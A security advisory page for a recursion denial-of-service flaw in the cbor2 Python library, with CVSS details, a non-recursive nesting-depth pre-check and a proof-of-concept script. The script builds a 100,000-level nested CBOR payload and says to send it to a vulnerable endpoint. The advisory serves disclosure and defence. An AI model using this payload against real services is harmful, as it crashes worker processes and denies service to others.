Security Vulnerability Report
CVE-2026-26209 CVSS 7.5 HIGH

CVE-2026-26209

Published: 2026-03-23 19:16:40
Last Modified: 2026-03-25 17:56:16

Description

cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) serialization format. Versions prior to 5.9.0 are vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding deeply nested CBOR structures. This vulnerability affects both the pure Python implementation and the C extension `_cbor2`. The C extension relies on Python's internal recursion limits `Py_EnterRecursiveCall` rather than a data-driven depth limit, meaning it still raises `RecursionError` and crashes the worker process when the limit is hit. While the library handles moderate nesting levels, it lacks a hard depth limit. An attacker can supply a crafted CBOR payload containing approximately 100,000 nested arrays `0x81`. When `cbor2.loads()` attempts to parse this, it hits the Python interpreter's maximum recursion depth or exhausts the stack, causing the process to crash with a `RecursionError`. Because the library does not enforce its own limits, it allows an external attacker to exhaust the host application's stack resource. In many web application servers (e.g., Gunicorn, Uvicorn) or task queues (Celery), an unhandled `RecursionError` terminates the worker process immediately. By sending a stream of these small (<100KB) malicious packets, an attacker can repeatedly crash worker processes, resulting in a complete Denial of Service for the application. Version 5.9.0 patches the issue.
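A defensive pre-check, added here as an example and not part of the advisory or of cbor2 itself: an iterative scan of the raw CBOR bytes that measures container nesting with an explicit stack instead of recursion, so an application can reject an over-nested payload before handing it to `cbor2.loads()`. The names `_read_head`, `max_nesting_depth`, `nesting_ok`, the 64-level default limit and the sample bytes are this example's own choices.

```python
def _read_head(data, pos):
    """One item header -> (major type, argument, next pos); argument None = indefinite."""
    mt, ai = data[pos] >> 5, data[pos] & 0x1F
    pos += 1
    if ai < 24:
        return mt, ai, pos
    if ai == 31:
        return mt, None, pos
    size = {24: 1, 25: 2, 26: 4, 27: 8}.get(ai)
    if size is None or pos + size > len(data):
        raise ValueError("malformed or truncated CBOR header")
    return mt, int.from_bytes(data[pos:pos + size], "big"), pos + size

def max_nesting_depth(data, limit=None):
    """Non-recursive scan: deepest container nesting, or ValueError past `limit` / on malformed data."""
    stack = []      # remaining item count per open container; None = indefinite length
    deepest, pos = 0, 0
    while pos < len(data):
        if data[pos] == 0xFF:                    # 'break' closes an indefinite container
            if not stack or stack[-1] is not None:
                raise ValueError("unexpected break code")
            stack.pop()
            pos += 1
        else:
            mt, arg, pos = _read_head(data, pos)
            if mt == 6:                          # a tag wraps the next item; no slot used
                continue
            if stack and stack[-1] is not None:  # this item fills one slot of its parent
                stack[-1] -= 1
            if mt in (2, 3) and arg is not None:
                pos += arg                       # skip byte/text string payload
            elif mt in (2, 3, 4, 5):             # array, map or chunked indefinite string
                stack.append(None if arg is None else arg * (2 if mt == 5 else 1))
                deepest = max(deepest, len(stack))
                if limit is not None and deepest > limit:
                    raise ValueError(f"CBOR nesting exceeds limit of {limit}")
        while stack and stack[-1] == 0:          # close containers with no items left
            stack.pop()
    if stack or pos > len(data):
        raise ValueError("truncated CBOR document")
    return deepest

def nesting_ok(data, limit=64):
    """Gate to run before cbor2.loads(): True only for well-formed data within limit."""
    try:
        return max_nesting_depth(data, limit) <= limit
    except ValueError:
        return False

SAMPLE = b"\x81\x81\x81\x00"   # constructed: [[[0]]], three nested one-element arrays
```

The scan costs one byte read per header, so even the 100,000-level payload the advisory describes is rejected in a fraction of a second without ever touching the interpreter's recursion limit; upgrading to cbor2 5.9.0 remains the actual fix.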

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:agronholm:cbor2:*:*:*:*:*:python:*:* - VULNERABLE
agronholm/cbor2 < 5.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-26209
# Generates a deeply nested CBOR payload to trigger RecursionError

def generate_malicious_cbor(depth=100000):
    """
    Generates a CBOR payload with 'depth' levels of nested arrays.
    CBOR format for an array with one element is 0x81.
    """
    # Start with a simple integer (e.g., 0)
    payload = b'\x00'
    # Prepend the array byte 'depth' times
    for _ in range(depth):
        payload = b'\x81' + payload
    return payload

if __name__ == "__main__":
    print("Generating malicious CBOR payload...")
    # Create a payload with 100,000 nested arrays
    malicious_data = generate_malicious_cbor(100000)
    print(f"Payload size: {len(malicious_data)} bytes")
    # Save to file
    with open("exploit.cbor", "wb") as f:
        f.write(malicious_data)
    print("Saved to exploit.cbor. Send this to a vulnerable cbor2.loads() endpoint.")
    # To test locally (will crash if vulnerable):
    # import cbor2
    # cbor2.loads(malicious_data)
```

References

https://github.com/agronholm/cbor2/commit/e61a5f365ba610d5907a0ae1bc72769bba34294b (Patch)
https://github.com/agronholm/cbor2/pull/275 (Issue Tracking, Patch)
https://github.com/agronholm/cbor2/releases/tag/5.9.0 (Product, Release Notes)
https://github.com/agronholm/cbor2/security/advisories/GHSA-3c37-wwvx-h642 (Exploit, Vendor Advisory)

Weakness: CWE-674 (Uncontrolled Recursion)